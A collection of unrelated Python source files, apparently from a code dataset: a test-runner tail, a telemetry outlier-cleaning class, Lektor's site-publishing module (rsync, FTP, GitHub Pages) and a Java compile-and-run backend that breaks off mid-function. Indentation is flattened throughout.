print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
if not EMTEST_SAVE_DIR:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
clean_data.py | # To specifically ignore ConvergenceWarnings:
import warnings
from collections import defaultdict
from functools import partial
from json import load
from os import path
import numpy as np
from tsmoothie import ExponentialSmoother, ConvolutionSmoother
import datetime
import threading
from time import sleep
from sklearn.cluster import KMeans
import logging
import logging.config
import logging.handlers
log = logging.getLogger('service')
logclean = logging.getLogger("cleaning")
class DataCleaning:
indexOfDeviceName = 0
indexOfSensorName = 1
indexOfTelemetry = 2
indexOfTimeSeries = 3
indexOfSeries = 4
obviousOutlier = 999999
cleaningConfig = None
def __init__(self):
# start thread
t = threading.Thread(target=self.get_cleaning_config)
t.start()
def createDevice(self, deviceList, data):
try:
newDeviceQueue = []
# add each sensor in incoming device to sub array in list_of_devices (that exists in tb_gateway_service.py)
for telemetry in data["telemetry"]["values"]:
newDeviceQueue.append(self.getTelemetryData(data, telemetry))
return newDeviceQueue
except Exception as e:
log.exception(e)
def doesDeviceExist(self, deviceList, data):
try:
index = -1
# if device exists in list_of_devices (in tb_gateway_service.py) return that index, otherwise return -1
for i in range(len(deviceList)):
if data["deviceName"] == deviceList[i][0][self.indexOfDeviceName]:
index = i
return index
except Exception as e:
log.exception(e)
def getTelemetryData(self, data, telemetry):
try:
# create sub arrays
deviceArray = []
telemetryArray = []
timeseriesArray = []
# add name of device and name sensor
deviceArray.append(data["deviceName"])
deviceArray.append(telemetry)
# add data point and the timestamp
telemetryArray.append(self.check_type(data["telemetry"]["values"][telemetry])) # return obvious deviation if data point is NaN
timeseriesArray.append(data["telemetry"]["ts"])
# add a dictionary in which cleaning related data is stored
series = defaultdict(partial(np.ndarray, shape=(1, 1), dtype='float32'))
deviceArray.append(telemetryArray)
deviceArray.append(timeseriesArray)
deviceArray.append(series)
return deviceArray
except Exception as e:
log.exception(e)
def addTelemetry(self, deviceList, data, deviceIndex):
try:
i = 0
for telemetry in data["telemetry"]["values"]:
series = deviceList[deviceIndex][i][self.indexOfSeries]
# Control data type for observed value
data_point = self.check_type(data["telemetry"]["values"][telemetry])
# get method and other params from cleaning config
cleaningMethod, window_len, std = self.get_cleaning_method(deviceList, deviceIndex, telemetry)
debug_data = [0]
# controls size of list
while (len(deviceList[deviceIndex][i][self.indexOfTelemetry]) > window_len):
self.removeFirstElements(deviceList, deviceIndex, telemetry)
# cleaning begins when length is greater than specified windows_len
if (len(deviceList[deviceIndex][i][self.indexOfTelemetry]) >= window_len):
if(cleaningMethod == "exponentialSmoother"):
data_point, debug_data = self._exponentialSmoother(data_point, series, window_len, std)
elif(cleaningMethod == "convolutionSmoother"):
data_point, debug_data = self._convolutionSmoother(data_point, series, window_len, std)
elif (cleaningMethod == "kmeans"):
data_point, debug_data = self._kmeans(data_point, series, window_len, std)
if debug_data[0] == 1:
time_of_cleaning = datetime.datetime.utcfromtimestamp(int(data["telemetry"]["ts"]) / 1000).strftime('%Y-%m-%d %H:%M:%S')
strerror = "# -- Outlier detected - " + str(time_of_cleaning)+ " " + str(deviceList[deviceIndex][i][self.indexOfDeviceName])+ " " + str(deviceList[deviceIndex][i][self.indexOfSensorName]) +\
"\t\tObserved value- " + str(debug_data[1]) + " Lower boundary- " + str(debug_data[2]) + " Upper boundary- " + str(debug_data[3]) + " Corrected value to- " + str(debug_data[4])
logclean.debug(str(strerror))
series['original'] = np.insert(series['original'], series['original'].size, [[data_point]])
if series['original'].size > window_len * 2:
series['original'] = series['original'][series['original'].size - window_len * 2:]
# add data point with timestamp to time series
deviceList[deviceIndex][i][self.indexOfTelemetry].append(data_point)
deviceList[deviceIndex][i][self.indexOfTimeSeries].append(data["telemetry"]["ts"]) # adding timeseries
i += 1
except Exception as e:
log.exception(e)
def removeFirstElements(self, deviceList, deviceIndex, telemetry):
try:
# remove first data point with its' timestamp
i = 0
for sensor in deviceList[deviceIndex]:
if sensor[1] == telemetry:
break
else:
i += 1
deviceList[deviceIndex][i][self.indexOfTelemetry].pop(0)
deviceList[deviceIndex][i][self.indexOfTimeSeries].pop(0)
except Exception as e:
log.exception(e)
def check_type(self, data_point):
# check if data point is valid type, if not make it valid but obvious outlier
if isinstance(data_point, str):
if data_point == "NaN":
return self.obviousOutlier
else:
return float(data_point)
else:
return data_point
def get_cleaning_config(self):
try:
# loads cleaning.json to update current cleaning config
config_file = path.abspath("thingsboard_gateway/config/cleaning.json")
with open(config_file) as conf:
self.cleaningConfig = load(conf)
except Exception as e:
log.exception(e)
sleep(60)
self.get_cleaning_config()
def check_if_cleaning_is_specified_for_all(self, deviceList):
try:
# checks if cleaning is specified
i = 0
for mpoint in deviceList:
j = 0
for attribute in deviceList[i][0]:
if(isinstance(attribute, str) and j == 0):
if(not self.check_if_cleaning_is_specified(attribute)):
exceptionString = "Cleaning.json does does not specify cleaning for the endpoint " + attribute
log.debug(exceptionString)
j += 1
i += 1
except Exception as e:
log.exception(e)
def check_if_cleaning_is_specified(self, attribute):
try:
# checks if cleaning is specified for a specific device
i = 0
for mpoint in self.cleaningConfig["devicesWithCleaning"]:
if(self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"] != ""):
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"] + ", " + self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"]
else:
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"]
if(nameOfDevice == attribute):
return True
i += 1
return False
except Exception as e:
log.exception(e)
def get_cleaning_method(self, deviceList, deviceIndex, telemetry):
try:
i = 0
for sensor in deviceList[deviceIndex]:
if sensor[1] == telemetry:
break
else:
i += 1
# returns the current cleaning method
deviceNameToCheck = deviceList[deviceIndex][i][self.indexOfDeviceName]
#print("looking for :", deviceNameToCheck)
i = 0
for mpoint in self.cleaningConfig["devicesWithCleaning"]:
if (self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"] != ""):
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"] + ", " + self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"]
else:
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"]
#print("name: ", nameOfDevice)
if (nameOfDevice == deviceNameToCheck):
j = 0
for specificCleaning in self.cleaningConfig["devicesWithCleaning"][i]["sensorsWithSpecificCleaning"]:
if (telemetry == specificCleaning["sensorName"] and j == 0):
return specificCleaning["cleaningMethod"], specificCleaning["windowLen"], specificCleaning["standardDeviation"]
j += 1
break
#print("1111111111111111111111111111111111")
#print(self.cleaningConfig["devicesWithCleaning"][i])
i += 1
#print("#####################################")
#print(self.cleaningConfig["devicesWithCleaning"][i])
return self.cleaningConfig["devicesWithCleaning"][i]["defaultCleaning"], \
self.cleaningConfig["devicesWithCleaning"][i]["defaultWindowLen"], self.cleaningConfig["devicesWithCleaning"][i]["defaultStandardDeviation"]
except Exception as e:
log.exception(e)
def _kmeans(self, data_point, series, window_len, std):
#print("in kmeans")
kmeans = KMeans(n_clusters=2)
clean = np.column_stack([0, 0])
for i in series["original"]:
temp = [[0, i]]
clean = np.vstack([clean, temp])
temp = [[0, data_point]]
clean = np.vstack([clean, temp])
kmeans.fit(clean)
y_kmeans = kmeans.predict(clean)
j = 0
# print(y_kmeans)
# print(clean[len(clean) - 20:len(clean)])
# centers = kmeans.clustercenters
#std = np.std(clean[:, 1])
#print("STD: ", 3 * std, "Average: ", np.average(clean[:, 1]), "boundary: ", np.average(clean[:, 1]) + 3 * std)
debug_data = [1, data_point, 3, 3, data_point]
return data_point, debug_data
def _exponentialSmoother(self, data_point, series, window_len, std):
# exponential smoothing algorithm
smoother = ExponentialSmoother(window_len=window_len // 2, alpha=0.4)
smoother.smooth(series['original'][-window_len:])
series['smooth'] = np.insert(series['smooth'], series['smooth'].size, smoother.smooth_data[-1][-1])
_low, _up = smoother.get_intervals('sigma_interval', n_sigma=std)
series['low'] = np.insert(series['low'], series['low'].size, _low[-1][-1])
series['up'] = np.insert(series['up'], series['up'].size, _up[-1][-1])
debug_data = [0]
if data_point > series['up'][-1]:
debug_data = [1, data_point, series['low'][-1], series['up'][-1], series['up'][-1]]
data_point = series['up'][-1]
series['original'][-1] = data_point
elif data_point < series['low'][-1]:
debug_data = [1, data_point, series['low'][-1], series['up'][-1], series['low'][-1]]
data_point = series['low'][-1]
series['original'][-1] = data_point
if series['smooth'].size > window_len:
series['smooth'] = series['smooth'][series['smooth'].size - window_len:]
series['low'] = series['low'][series['low'].size - window_len:]
series['up'] = series['up'][series['up'].size - window_len:]
return data_point, debug_data
def _convolutionSmoother(self, data_point, series, window_len, std):
smoother = ConvolutionSmoother(window_len=window_len, window_type='ones')
smoother.smooth(series['original'][-window_len:])
series['smooth'] = np.insert(series['smooth'], series['smooth'].size, smoother.smooth_data[-1][-1])
_low, _up = smoother.get_intervals('sigma_interval', n_sigma=std)
series['low'] = np.insert(series['low'], series['low'].size, _low[-1][-1])
series['up'] = np.insert(series['up'], series['up'].size, _up[-1][-1])
debug_data = [0]
if data_point > series['up'][-1]:
debug_data = [1, data_point, series['low'][-1], series['up'][-1], series['up'][-1]]
data_point = series['up'][-1]
series['original'][-1] = data_point
elif data_point < series['low'][-1]:
debug_data = [1, data_point, series['low'][-1], series['up'][-1], series['low'][-1]]
data_point = series['low'][-1]
series['original'][-1] = data_point
if series['smooth'].size > window_len:
series['smooth'] = series['smooth'][series['smooth'].size - window_len:]
series['low'] = series['low'][series['low'].size - window_len:]
series['up'] = series['up'][series['up'].size - window_len:]
return data_point, debug_data
|
publisher.py | import errno
import hashlib
import os
import posixpath
import queue
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from io import BytesIO
from werkzeug import urls
from lektor.exception import LektorException
from lektor.utils import locate_executable
from lektor.utils import portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
("GIT_COMMITTER_NAME", "GIT_AUTHOR_NAME", "Lektor Bot"),
("GIT_COMMITTER_EMAIL", "GIT_AUTHOR_EMAIL", "bot@getlektor.com"),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get("GIT_SSH_COMMAND"):
env["GIT_SSH_COMMAND"] = ssh_command
return env
def _write_ssh_key_file(temp_fn, credentials):
if credentials:
key_file = credentials.get("key_file")
if key_file is not None:
return key_file
key = credentials.get("key")
if key:
parts = key.split(":", 1)
if len(parts) == 1:
kt = "RSA"
else:
kt, key = parts
with open(temp_fn, "w") as f:
f.write("-----BEGIN %s PRIVATE KEY-----\n" % kt.upper())
for x in range(0, len(key), 64):
f.write(key[x : x + 64] + "\n")
f.write("-----END %s PRIVATE KEY-----\n" % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append("-p %s" % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return "ssh %s" % " ".join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix=".deploytemp", dir=base)
scratch = os.path.join(folder, "scratch")
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
except (IOError, OSError):
pass
class PublishError(LektorException):
"""Raised by publishers if something goes wrong."""
class Command(object):
def __init__(self, argline, cwd=None, env=None, capture=True, silent=False):
environ = dict(os.environ)
if env:
environ.update(env)
kwargs = {"cwd": cwd, "env": environ}
if silent:
self.devnull = open(os.devnull, "rb+")
kwargs["stdout"] = self.devnull
kwargs["stderr"] = self.devnull
capture = False
if capture:
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
self.capture = capture
self._cmd = portable_popen(argline, **kwargs)
def wait(self):
returncode = self._cmd.wait()
if hasattr(self, "devnull"):
self.devnull.close()
return returncode
@property
def returncode(self):
return self._cmd.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self._cmd.wait()
def __iter__(self):
if not self.capture:
raise RuntimeError("Not capturing")
# Windows platforms do not have select() for files
if os.name == "nt":
q = queue.Queue()
def reader(stream):
while 1:
line = stream.readline()
q.put(line)
if not line:
break
t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
t1.setDaemon(True)
t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
t2.setDaemon(True)
t1.start()
t2.start()
outstanding = 2
while outstanding:
item = q.get()
if not item:
outstanding -= 1
else:
yield item.rstrip().decode("utf-8", "replace")
# Otherwise we can go with select()
else:
streams = [self._cmd.stdout, self._cmd.stderr]
while streams:
for l in select.select(streams, [], streams):
for stream in l:
line = stream.readline()
if not line:
if stream in streams:
streams.remove(stream)
break
yield line.rstrip().decode("utf-8", "replace")
def safe_iter(self):
with self:
for line in self:
yield line
@property
def output(self):
return self.safe_iter()
class Publisher(object):
def __init__(self, env, output_path):
self.env = env
self.output_path = os.path.abspath(output_path)
def fail(self, message):
raise PublishError(message)
def publish(self, target_url, credentials=None, **extra):
raise NotImplementedError()
class RsyncPublisher(Publisher):
def get_command(self, target_url, tempdir, credentials):
credentials = credentials or {}
argline = ["rsync", "-rclzv", "--exclude=.lektor"]
target = []
env = {}
options = target_url.decode_query()
exclude = options.getlist("exclude")
for file in exclude:
argline.extend(("--exclude", file))
delete = options.get("delete", False) in ("", "on", "yes", "true", "1", None)
if delete:
argline.append("--delete-delay")
keyfile = _write_ssh_key_file(
os.path.join(tempdir, "ssh-auth-key"), credentials
)
if target_url.port is not None or keyfile is not None:
argline.append("-e")
argline.append(_get_ssh_cmd(target_url.port, keyfile))
username = credentials.get("username") or target_url.username
if username:
target.append(username + "@")
if target_url.ascii_host is not None:
target.append(target_url.ascii_host)
target.append(":")
target.append(target_url.path.rstrip("/") + "/")
argline.append(self.output_path.rstrip("/\\") + "/")
argline.append("".join(target))
return Command(argline, env=env)
def publish(self, target_url, credentials=None, **extra):
with _temporary_folder(self.env) as tempdir:
client = self.get_command(target_url, tempdir, credentials)
with client:
for line in client:
yield line
class FtpConnection(object):
def __init__(self, url, credentials=None):
credentials = credentials or {}
self.con = self.make_connection()
self.url = url
self.username = credentials.get("username") or url.username
self.password = credentials.get("password") or url.password
self.log_buffer = []
self._known_folders = set()
def make_connection(self):
from ftplib import FTP
return FTP()
def drain_log(self):
log = self.log_buffer[:]
del self.log_buffer[:]
for chunk in log:
for line in chunk.splitlines():
if not isinstance(line, str):
line = line.decode("utf-8", "replace")
yield line.rstrip()
def connect(self):
options = self.url.decode_query()
log = self.log_buffer
log.append("000 Connecting to server ...")
try:
log.append(self.con.connect(self.url.ascii_host, self.url.port or 21))
except Exception as e:
log.append("000 Could not connect.")
log.append(str(e))
return False
try:
credentials = {}
if self.username:
credentials["user"] = self.username
if self.password:
credentials["passwd"] = self.password
log.append(self.con.login(**credentials))
except Exception as e:
log.append("000 Could not authenticate.")
log.append(str(e))
return False
passive = options.get("passive") in ("on", "yes", "true", "1", None)
log.append("000 Using passive mode: %s" % (passive and "yes" or "no"))
self.con.set_pasv(passive)
try:
log.append(self.con.cwd(self.url.path))
except Exception as e:
log.append(str(e))
return False
log.append("000 Connected!")
return True
def mkdir(self, path, recursive=True):
if not isinstance(path, str):
path = path.decode("utf-8")
if path in self._known_folders:
return
dirname, _ = posixpath.split(path)
if dirname and recursive:
self.mkdir(dirname)
try:
self.con.mkd(path)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(str(e))
return
self._known_folders.add(path)
def append(self, filename, data):
if not isinstance(filename, str):
filename = filename.decode("utf-8")
input = BytesIO(data.encode("utf-8"))
try:
self.con.storbinary("APPE " + filename, input)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def get_file(self, filename, out=None):
if not isinstance(filename, str):
filename = filename.decode("utf-8")
getvalue = False
if out is None:
out = BytesIO()
getvalue = True
try:
self.con.retrbinary("RETR " + filename, out.write)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(e)
return None
if getvalue:
return out.getvalue().decode("utf-8")
return out
def upload_file(self, filename, src, mkdir=False):
if isinstance(src, str):
src = BytesIO(src.encode("utf-8"))
if mkdir:
directory = posixpath.dirname(filename)
if directory:
self.mkdir(directory, recursive=True)
if not isinstance(filename, str):
filename = filename.decode("utf-8")
try:
self.con.storbinary("STOR " + filename, src, blocksize=32768)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def rename_file(self, src, dst):
try:
self.con.rename(src, dst)
except FTPError as e:
self.log_buffer.append(str(e))
try:
self.con.delete(dst)
except Exception as e:
self.log_buffer.append(str(e))
try:
self.con.rename(src, dst)
except Exception as e:
self.log_buffer.append(str(e))
def delete_file(self, filename):
if isinstance(filename, str):
filename = filename.encode("utf-8")
try:
self.con.delete(filename)
except Exception as e:
self.log_buffer.append(str(e))
def delete_folder(self, filename):
if isinstance(filename, str):
filename = filename.encode("utf-8")
try:
self.con.rmd(filename)
except Exception as e:
self.log_buffer.append(str(e))
self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
def make_connection(self):
from ftplib import FTP_TLS
return FTP_TLS()
def connect(self):
connected = super().connect()
if connected:
# Upgrade data connection to TLS.
self.con.prot_p() # pylint: disable=no-member
return connected
class FtpPublisher(Publisher):
connection_class = FtpConnection
def read_existing_artifacts(self, con):
contents = con.get_file(".lektor/listing")
if not contents:
return {}, set()
duplicates = set()
rv = {}
# Later records override earlier ones. There can be duplicate
# entries if the file was not compressed.
for line in contents.splitlines():
items = line.split("|")
if len(items) == 2:
if not isinstance(items[0], str):
artifact_name = items[0].decode("utf-8")
else:
artifact_name = items[0]
if artifact_name in rv:
duplicates.add(artifact_name)
rv[artifact_name] = items[1]
return rv, duplicates
def iter_artifacts(self):
"""Iterates over all artifacts in the build folder and yields the
artifacts.
"""
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if not self.env.is_ignored_artifact(x)]
for filename in filenames:
if self.env.is_ignored_artifact(filename):
continue
full_path = os.path.join(self.output_path, dirpath, filename)
local_path = full_path[len(self.output_path) :].lstrip(os.path.sep)
if os.path.altsep:
local_path = local_path.lstrip(os.path.altsep)
h = hashlib.sha1()
try:
with open(full_path, "rb") as f:
while 1:
item = f.read(4096)
if not item:
break
h.update(item)
except IOError as e:
if e.errno != errno.ENOENT:
raise
yield (
local_path.replace(os.path.sep, "/"),
full_path,
h.hexdigest(),
)
def get_temp_filename(self, filename):
dirname, basename = posixpath.split(filename)
return posixpath.join(dirname, "." + basename + ".tmp")
def upload_artifact(self, con, artifact_name, source_file, checksum):
with open(source_file, "rb") as source:
tmp_dst = self.get_temp_filename(artifact_name)
con.log_buffer.append("000 Updating %s" % artifact_name)
con.upload_file(tmp_dst, source, mkdir=True)
con.rename_file(tmp_dst, artifact_name)
con.append(".lektor/listing", "%s|%s\n" % (artifact_name, checksum))
def consolidate_listing(self, con, current_artifacts):
server_artifacts, duplicates = self.read_existing_artifacts(con)
known_folders = set()
for artifact_name in current_artifacts.keys():
known_folders.add(posixpath.dirname(artifact_name))
for artifact_name, checksum in server_artifacts.items():
if artifact_name not in current_artifacts:
con.log_buffer.append("000 Deleting %s" % artifact_name)
con.delete_file(artifact_name)
folder = posixpath.dirname(artifact_name)
if folder not in known_folders:
con.log_buffer.append("000 Deleting %s" % folder)
con.delete_folder(folder)
if duplicates or server_artifacts != current_artifacts:
listing = []
for artifact_name, checksum in current_artifacts.items():
listing.append("%s|%s\n" % (artifact_name, checksum))
listing.sort()
con.upload_file(".lektor/.listing.tmp", "".join(listing))
con.rename_file(".lektor/.listing.tmp", ".lektor/listing")
def publish(self, target_url, credentials=None, **extra):
con = self.connection_class(target_url, credentials)
connected = con.connect()
for event in con.drain_log():
yield event
if not connected:
return
yield "000 Reading server state ..."
con.mkdir(".lektor")
committed_artifacts, _ = self.read_existing_artifacts(con)
for event in con.drain_log():
yield event
yield "000 Begin sync ..."
current_artifacts = {}
for artifact_name, filename, checksum in self.iter_artifacts():
current_artifacts[artifact_name] = checksum
if checksum != committed_artifacts.get(artifact_name):
self.upload_artifact(con, artifact_name, filename, checksum)
for event in con.drain_log():
yield event
yield "000 Sync done!"
yield "000 Consolidating server state ..."
self.consolidate_listing(con, current_artifacts)
for event in con.drain_log():
yield event
yield "000 All done!"
class FtpTlsPublisher(FtpPublisher):
connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
def get_credentials(self, url, credentials=None):
credentials = credentials or {}
username = credentials.get("username") or url.username
password = credentials.get("password") or url.password
rv = username
if username and password:
rv += ":" + password
return rv if rv else None
def update_git_config(self, repo, url, branch, credentials=None):
ssh_command = None
path = url.host + u"/" + url.path.strip(u"/")
cred = None
if url.scheme in ("ghpages", "ghpages+ssh"):
push_url = "git@github.com:%s.git" % path
keyfile = _write_ssh_key_file(
os.path.join(repo, ".git", "ssh-auth-key"), credentials
)
if keyfile or url.port:
ssh_command = _get_ssh_cmd(url.port, keyfile)
else:
push_url = "https://github.com/%s.git" % path
cred = self.get_credentials(url, credentials)
with open(os.path.join(repo, ".git", "config"), "a") as f:
f.write(
'[remote "origin"]\nurl = %s\n'
"fetch = +refs/heads/%s:refs/remotes/origin/%s\n"
% (push_url, branch, branch)
)
if cred:
cred_path = os.path.join(repo, ".git", "credentials")
f.write('[credential]\nhelper = store --file "%s"\n' % cred_path)
with open(cred_path, "w") as cf:
cf.write("https://%s@github.com\n" % cred)
return ssh_command
def link_artifacts(self, path):
try:
link = os.link
except AttributeError:
link = shutil.copy
# Clean old
for filename in os.listdir(path):
if filename == ".git":
continue
filename = os.path.join(path, filename)
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename)
# Add new
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if x != ".lektor"]
for filename in filenames:
full_path = os.path.join(self.output_path, dirpath, filename)
dst = os.path.join(
path,
full_path[len(self.output_path) :]
.lstrip(os.path.sep)
.lstrip(os.path.altsep or ""),
)
try:
os.makedirs(os.path.dirname(dst))
except (OSError, IOError):
pass
try:
link(full_path, dst)
except OSError: # Different Filesystems
shutil.copy(full_path, dst)
def write_cname(self, path, target_url):
params = target_url.decode_query()
cname = params.get("cname")
if cname is not None:
with open(os.path.join(path, "CNAME"), "w") as f:
f.write("%s\n" % cname)
def detect_target_branch(self, target_url):
# When pushing to the username.github.io repo we need to push to
# master, otherwise to gh-pages
if target_url.host.lower() + ".github.io" == target_url.path.strip("/").lower():
branch = "master"
else:
branch = "gh-pages"
return branch
def publish(self, target_url, credentials=None, **extra):
if not locate_executable("git"):
self.fail("git executable not found; cannot deploy.")
branch = self.detect_target_branch(target_url)
with _temporary_folder(self.env) as path:
ssh_command = None
def git(args, **kwargs):
kwargs["env"] = _patch_git_env(kwargs.pop("env", None), ssh_command)
return Command(["git"] + args, cwd=path, **kwargs)
for line in git(["init"]).output:
yield line
ssh_command = self.update_git_config(path, target_url, branch, credentials)
for line in git(["remote", "update"]).output:
yield line
if git(["checkout", "-q", branch], silent=True).wait() != 0:
git(["checkout", "-qb", branch], silent=True).wait()
self.link_artifacts(path)
self.write_cname(path, target_url)
for line in git(["add", "-f", "--all", "."]).output:
yield line
for line in git(["commit", "-qm", "Synchronized build"]).output:
yield line
for line in git(["push", "origin", branch]).output:
yield line
builtin_publishers = {
"rsync": RsyncPublisher,
"ftp": FtpPublisher,
"ftps": FtpTlsPublisher,
"ghpages": GithubPagesPublisher,
"ghpages+https": GithubPagesPublisher,
"ghpages+ssh": GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
url = urls.url_parse(str(target))
publisher = env.publishers.get(url.scheme)
if publisher is None:
raise PublishError('"%s" is an unknown scheme.' % url.scheme)
return publisher(env, output_path).publish(url, credentials, **extra)
|
compiler.py | from subprocess import Popen, PIPE, STDOUT, TimeoutExpired
from queue import Queue, Empty
from threading import Thread
import os
import re
import settings
class_pat = re.compile("(public\s+)?class\s+(?P<name>\w+)", re.MULTILINE)
java_exe = os.path.join(settings.jdk_path, 'java')
javac_exe = os.path.join(settings.jdk_path, 'javac')
def extract_class_name(source):
m = class_pat.search(source)
if m is not None:
return m.group("name")
else:
return "BadName"
def write_file(path, contents):
f = open(path, "w")
f.write(contents)
f.close()
class Program:
# callbacks must have the following methods:
# compiled(ecode, logs), stdout(data), stderr(data), stdin_ack(data), done(ecode)
def __init__(self, source, dirpath, callbacks):
if type(source) is not str and len(source) < 9:
raise ValueError("source must be a non-empty string")
if not os.path.isdir(dirpath):
raise ValueError("dirpath must be a valid directory")
self._name = extract_class_name(source)
self._dir = dirpath
write_file(os.path.join(self._dir, self._name + ".java"), source)
self._queue = Queue()
self._cbs = callbacks
def _compile(self):
try:
return Popen([javac_exe, "-Xlint", self._name + ".java"], cwd=self._dir, stdout=PIPE, stderr=STDOUT)
except FileNotFoundError as e:
print("Error:", e.strerror)
return None
def _execute(self):
try:
return Popen([java_exe, self._name], cwd=self._dir, stdin=PIPE, stdout=PIPE, stderr=PIPE)
except FileNotFoundError as e:
print("Error:", e.strerror)
return None
def spawn_bg(self):
t = _spawn(_main, args=(self,))
t.start()
return t
def kill(self):
self._queue.put(("kill", None), timeout=1)
def stdin(self, data):
if (type(data) != bytes):
raise TypeError("data must be bytes")
self._queue.put(("stdin", data))
def _spawn(func, args):
#return Greenlet(func, *args)
return Thread(target=func, args=args)
def read2Q(key, stream, notifq, limit_size=4096, limit_lines=256):
size = 0
lines = 0
while True:
if size > limit_size or lines > limit_lines:
stream.close()
notifq.put((key, b'%\n\n>>> output limit exceeded! stream closed <<<'))
break
out = stream.read1(256)
if out:
notifq.put((key, out))
size += len(out)
lines += out.count(b'\n')
else:
notifq.put((key, None))
break
def _main(program):
proc = program._compile()
if proc is None:
program._cbs.error("Backend could not find a Java compiler.")
return
outt = _spawn(read2Q, args=('stdout', proc.stdout, program._queue))
outt.start()
done = False
killed = False
logs = b''
while True:
if proc.poll() is not None: # proc exited
done = True
outt.join()
try:
if not done:
key, data = program._queue.get(timeout=0.5)
else:
key, data = program._queue.get_nowait()
except Empty:
if done:
break
continue
if key == 'stdout':
if data is not None:
logs += data
elif key == 'kill':
proc.kill()
killed = True
ecode = proc.returncode
program._cbs.compiled(ecode, logs)
if ecode != 0:
program._cbs.done(None)
return
elif killed:
program._cbs.done(-9)
return
proc = program._execute()
outt = _spawn(read2Q, args=('stdout', proc.stdout, program._queue))
outt.start()
errt = _spawn(read2Q, args=('stderr', proc.stderr, program._queue))
errt.start()
done = False
while True:
if proc.poll() is not None:
done = True
outt.join()
errt.join()
try:
if not done:
key, data = program._queue.get(timeout=0.5)
else:
key, data = program._queue.get_nowait()
except Empty:
if done:
break
continue
if key == 'stdin':
if len(data) > 0:
proc.stdin.write(data)
program._cbs.stdin_ack(data)
try:
proc.stdin.flush()
except OSError as e:
print("== OSError:", e)
elif key == 'stdout':
if data is not None:
program._cbs.stdout(data)
